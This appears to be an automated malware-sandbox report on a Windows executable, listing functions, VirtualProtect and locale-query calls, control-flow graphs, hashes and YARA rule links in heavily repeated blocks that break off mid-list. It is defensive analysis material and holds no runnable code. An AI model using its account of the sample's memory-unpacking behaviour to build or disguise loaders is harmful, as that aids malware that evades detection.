                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID:
                                                                                                      • API String ID: 2949231068-0
                                                                                                      • Opcode ID: a7afdae16a744a8333ad81b5320f7206432f86799e689f5ff0a5ebf6a16492b1
                                                                                                      • Instruction ID: 1bd068a8b62a01562c27ff558f8d20b48ec462fb89515b8e9356ed1e33fb90ec
                                                                                                      • Opcode Fuzzy Hash: a7afdae16a744a8333ad81b5320f7206432f86799e689f5ff0a5ebf6a16492b1
                                                                                                      • Instruction Fuzzy Hash: 0331BFB1D092285AEB649B24DC947FABB74EB46310F1040FED90A66281EB381EC1CF95
                                                                                                      Function 00417A4F Relevance: 1.6, APIs: 1, Instructions: 84nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417B2D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID:
                                                                                                      • API String ID: 2949231068-0
                                                                                                      • Opcode ID: 8f078d679a0ce1c56430a3e4359d6e62c4712ab68af885da2047df59312fe3a7
                                                                                                      • Instruction ID: 78f4e124550d8bedda143565d18a21aa937281529d31069dbeb22692ff8b445e
                                                                                                      • Opcode Fuzzy Hash: 8f078d679a0ce1c56430a3e4359d6e62c4712ab68af885da2047df59312fe3a7
                                                                                                      • Instruction Fuzzy Hash: 4C31AF75D092688AEB648B54DC547FABB75EF46314F1040FED80E66281EB381EC2CF95
                                                                                                      Function 00416FC7 Relevance: 1.6, APIs: 1, Instructions: 72nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417B2D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID:
                                                                                                      • API String ID: 2949231068-0
                                                                                                      • Opcode ID: f71b0ee1ddbf287e35fc28c4beb0660a39a58e87eedb2adc3da97362580e548d
                                                                                                      • Instruction ID: 02a4a79a47db8c8147defcc5fda50f193cf7e2885398a96f2937568b544bc7ff
                                                                                                      • Opcode Fuzzy Hash: f71b0ee1ddbf287e35fc28c4beb0660a39a58e87eedb2adc3da97362580e548d
                                                                                                      • Instruction Fuzzy Hash: 77210171C0912856FB649B68DD547FBB770EB46310F1040BFD90E26281EB3C1EC2CAA6
                                                                                                      Function 00417870 Relevance: 1.6, APIs: 1, Instructions: 69nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417B2D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID:
                                                                                                      • API String ID: 2949231068-0
                                                                                                      • Opcode ID: e321268bd960527c374091fd53b46a274a4c01a028cf88c390989c04f58429b2
                                                                                                      • Instruction ID: 19622dba122e4f72deeeb2a0f944f7062f74c4c42313be11e7f970c99b4a3e9d
                                                                                                      • Opcode Fuzzy Hash: e321268bd960527c374091fd53b46a274a4c01a028cf88c390989c04f58429b2
                                                                                                      • Instruction Fuzzy Hash: AD21F275D092285AEB648B54DD546FBB734EB46310F1040FED90E63281EB381EC2CFA6
                                                                                                      Function 0041783E Relevance: 1.6, APIs: 1, Instructions: 69nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417B2D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID:
                                                                                                      • API String ID: 2949231068-0
                                                                                                      • Opcode ID: e2a24f90d84e0b1e4d972112ff7f6d063273648b66f9c753370cdfb96fb9505e
                                                                                                      • Instruction ID: cdb2c147dcde584155c4d39463e85e27cc8072c5a5b61d3930a76fe92348d0cd
                                                                                                      • Opcode Fuzzy Hash: e2a24f90d84e0b1e4d972112ff7f6d063273648b66f9c753370cdfb96fb9505e
                                                                                                      • Instruction Fuzzy Hash: EB21C275D092285AEB648B55DD546FBB735EB46310F1040FED90E63281EB381EC2CFA6
                                                                                                      Function 00417895 Relevance: 1.6, APIs: 1, Instructions: 69nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417B2D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID:
                                                                                                      • API String ID: 2949231068-0
                                                                                                      • Opcode ID: e2f0a3f894da7ea0ee2ceec7ff65e770205740e7c7116cc4f2ee5ffcf33e4279
                                                                                                      • Instruction ID: 846e67c9e3b9f74bf88ade53f34c181d113363614f04d3859cc8a617fd8c1f2b
                                                                                                      • Opcode Fuzzy Hash: e2f0a3f894da7ea0ee2ceec7ff65e770205740e7c7116cc4f2ee5ffcf33e4279
                                                                                                      • Instruction Fuzzy Hash: 5121C275D092285AEB648B55DD546FBB735EB46310F1040FED90E63281EB381EC2CFA6
                                                                                                      Function 0041D736 Relevance: 51.2, APIs: 1, Strings: 28, Instructions: 448memoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 41d736-41d778 2 41d78b-41d7a0 0->2 3 41d77a-41d786 0->3 5 41d7b3-41d7d2 2->5 6 41d7a2-41d7ae 2->6 4 41da7c-41daa7 VirtualProtect 3->4 10 41dae7-41daed 4->10 11 41daa9-41dae5 call 41dad7 4->11 8 41d7e5-41d7f7 5->8 9 41d7d4-41d7e0 5->9 6->4 12 41d7f9-41d805 8->12 13 41d80a-41d873 8->13 9->4 16 41daf3-41dafa 10->16 11->16 12->4 17 41da70-41da76 13->17 18 41d879-41d8c3 13->18 20 41db33-41dbd8 call 41dbd9 16->20 21 41dafc-41db2e call 41db1e 16->21 17->4 22 41d8d4-41d8e5 18->22 30 41e07c-41e475 call 41e0ed 20->30 21->30 25 41d986-41d9d7 22->25 26 41d8eb-41d8fb 22->26 36 41d9e5-41da3c 25->36 37 41d9d9-41d9e3 25->37 26->25 29 41d901-41d952 26->29 34 41d954-41d976 29->34 35 41d978 29->35 49 41ed87-41f488 call 41edfc ExitProcess 30->49 50 41e47b-41e601 call 41e5ea 30->50 34->35 39 41d97f 34->39 35->22 42 41da4a 36->42 43 41da3e-41da48 36->43 41 41da54-41da5b 37->41 39->25 44 41da6b 41->44 45 41da5d-41da69 41->45 42->41 43->41 44->17 45->4 58 41e603-41e60d 50->58 59 41e612-41e65d 50->59 62 41e8ce-41e8f5 call 41e8ee 58->62 67 41e65f-41e669 59->67 68 41e66e-41e674 59->68 72 41e8fa 62->72 67->62 70 41e67a-41e6d2 68->70 74 41e6d9-41e7a0 call 41e6ed 70->74 72->72 77 41e7a2-41e7b8 74->77 78 41e7ba-41e7ca 74->78 80 41e81d-41e824 77->80 78->74 79 41e7d0-41e7e3 78->79 79->74 81 41e7e9-41e7f9 79->81 82 41e866-41e8b2 call 41e87e 80->82 83 41e826-41e864 call 41e837 call 41e854 80->83 85 41e807 81->85 86 41e7fb-41e805 81->86 95 41e8c4 82->95 96 41e8b4-41e8be 82->96 83->62 89 41e811-41e817 85->89 86->89 89->80 95->62 96->70 96->95
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,0041D4B0,?,?,00000000,?,0041C7A9,0041C7A9,0041C7A9,?,?), ref: 0041DA9F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID: 1$1$E$L$L$P$W$a$a$b$c$d$e$i$i$o$o$o$o$r$r$r$s$s$t$v$x$y
                                                                                                      • API String ID: 544645111-3095883573
                                                                                                      • Opcode ID: 7f92883232ef94752e02d151f25473cc3c61abe3d3208293eb71ab294d84c57d
                                                                                                      • Instruction ID: 584e5471985b2cb73c311731bbe5190878ef7d567af959a8eff6f8c461617d58
                                                                                                      • Opcode Fuzzy Hash: 7f92883232ef94752e02d151f25473cc3c61abe3d3208293eb71ab294d84c57d
                                                                                                      • Instruction Fuzzy Hash: 5E12D1B1D085688BEB20CB18CC44BEABBB6AF91304F1480EAD44D67382D6795FC5CF56
                                                                                                      Function 0041CF2A Relevance: 44.0, APIs: 1, Strings: 24, Instructions: 230memoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 465 41cf2a-41daa7 VirtualProtect 468 41dae7-41daed 465->468 469 41daa9-41dae5 call 41dad7 465->469 471 41daf3-41dafa 468->471 469->471 473 41db33-41dbd8 call 41dbd9 471->473 474 41dafc-41db2e call 41db1e 471->474 479 41e07c-41e475 call 41e0ed 473->479 474->479 486 41ed87-41f488 call 41edfc ExitProcess 479->486 487 41e47b-41e601 call 41e5ea 479->487 495 41e603-41e60d 487->495 496 41e612-41e65d 487->496 499 41e8ce-41e8f5 call 41e8ee 495->499 504 41e65f-41e669 496->504 505 41e66e-41e674 496->505 509 41e8fa 499->509 504->499 507 41e67a-41e6d2 505->507 511 41e6d9-41e7a0 call 41e6ed 507->511 509->509 514 41e7a2-41e7b8 511->514 515 41e7ba-41e7ca 511->515 517 41e81d-41e824 514->517 515->511 516 41e7d0-41e7e3 515->516 516->511 518 41e7e9-41e7f9 516->518 519 41e866-41e8b2 call 41e87e 517->519 520 41e826-41e864 call 41e837 call 41e854 517->520 522 41e807 518->522 523 41e7fb-41e805 518->523 532 41e8c4 519->532 533 41e8b4-41e8be 519->533 520->499 526 41e811-41e817 522->526 523->526 526->517 532->499 533->507 533->532
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,0041D4B0,?,?,00000000,?,0041C7A9,0041C7A9,0041C7A9,?,?), ref: 0041DA9F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID: 6@24$E$L$L$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                      • API String ID: 544645111-193774789
                                                                                                      • Opcode ID: 5c9f827b49a957eb15ca567959cc86e0e9f7a4ceec83bfa2b6ecdf4a66799a8e
                                                                                                      • Instruction ID: ad6dd12e43525a6af43e683b855df4d578eeae3d02b4d6a2d69982af06f3849e
                                                                                                      • Opcode Fuzzy Hash: 5c9f827b49a957eb15ca567959cc86e0e9f7a4ceec83bfa2b6ecdf4a66799a8e
                                                                                                      • Instruction Fuzzy Hash: EEA10671E086A88AF7218724DC447DABBB1AF91304F1480FEC48C57282DA7E5FC5CB66
                                                                                                      Function 0041D3B6 Relevance: 42.3, APIs: 1, Strings: 23, Instructions: 305COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 655 41d3b6-41d41b 658 41d41d-41d427 655->658 659 41d42c-41d458 655->659 661 41d6e8-41d778 call 41d736 658->661 659->661 662 41d45e call 41d46c 659->662 667 41d78b-41d7a0 661->667 668 41d77a-41d786 661->668 662->661 670 41d7b3-41d7d2 667->670 671 41d7a2-41d7ae 667->671 669 41da7c-41daa7 VirtualProtect 668->669 675 41dae7-41daed 669->675 676 41daa9-41dae5 call 41dad7 669->676 673 41d7e5-41d7f7 670->673 674 41d7d4-41d7e0 670->674 671->669 677 41d7f9-41d805 673->677 678 41d80a-41d873 673->678 674->669 681 41daf3-41dafa 675->681 676->681 677->669 682 41da70-41da76 678->682 683 41d879-41d8c3 678->683 685 41db33-41dbd8 call 41dbd9 681->685 686 41dafc-41db2e call 41db1e 681->686 682->669 687 41d8d4-41d8e5 683->687 695 41e07c-41e475 call 41e0ed 685->695 686->695 690 41d986-41d9d7 687->690 691 41d8eb-41d8fb 687->691 701 41d9e5-41da3c 690->701 702 41d9d9-41d9e3 690->702 691->690 694 41d901-41d952 691->694 699 41d954-41d976 694->699 700 41d978 694->700 714 41ed87-41f488 call 41edfc ExitProcess 695->714 715 41e47b-41e601 call 41e5ea 695->715 699->700 704 41d97f 699->704 700->687 707 41da4a 701->707 708 41da3e-41da48 701->708 706 41da54-41da5b 702->706 704->690 709 41da6b 706->709 710 41da5d-41da69 706->710 707->706 708->706 709->682 710->669 723 41e603-41e60d 715->723 724 41e612-41e65d 715->724 727 41e8ce-41e8f5 call 41e8ee 723->727 732 41e65f-41e669 724->732 733 41e66e-41e674 724->733 737 41e8fa 727->737 732->727 735 41e67a-41e6d2 733->735 739 41e6d9-41e7a0 call 41e6ed 735->739 737->737 742 41e7a2-41e7b8 739->742 743 41e7ba-41e7ca 739->743 745 41e81d-41e824 742->745 743->739 744 41e7d0-41e7e3 743->744 744->739 746 41e7e9-41e7f9 744->746 747 41e866-41e8b2 call 41e87e 745->747 748 41e826-41e864 call 41e837 call 41e854 745->748 750 41e807 746->750 751 41e7fb-41e805 746->751 760 41e8c4 747->760 761 41e8b4-41e8be 747->761 748->727 754 41e811-41e817 750->754 751->754 754->745 760->727 761->735 761->760
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
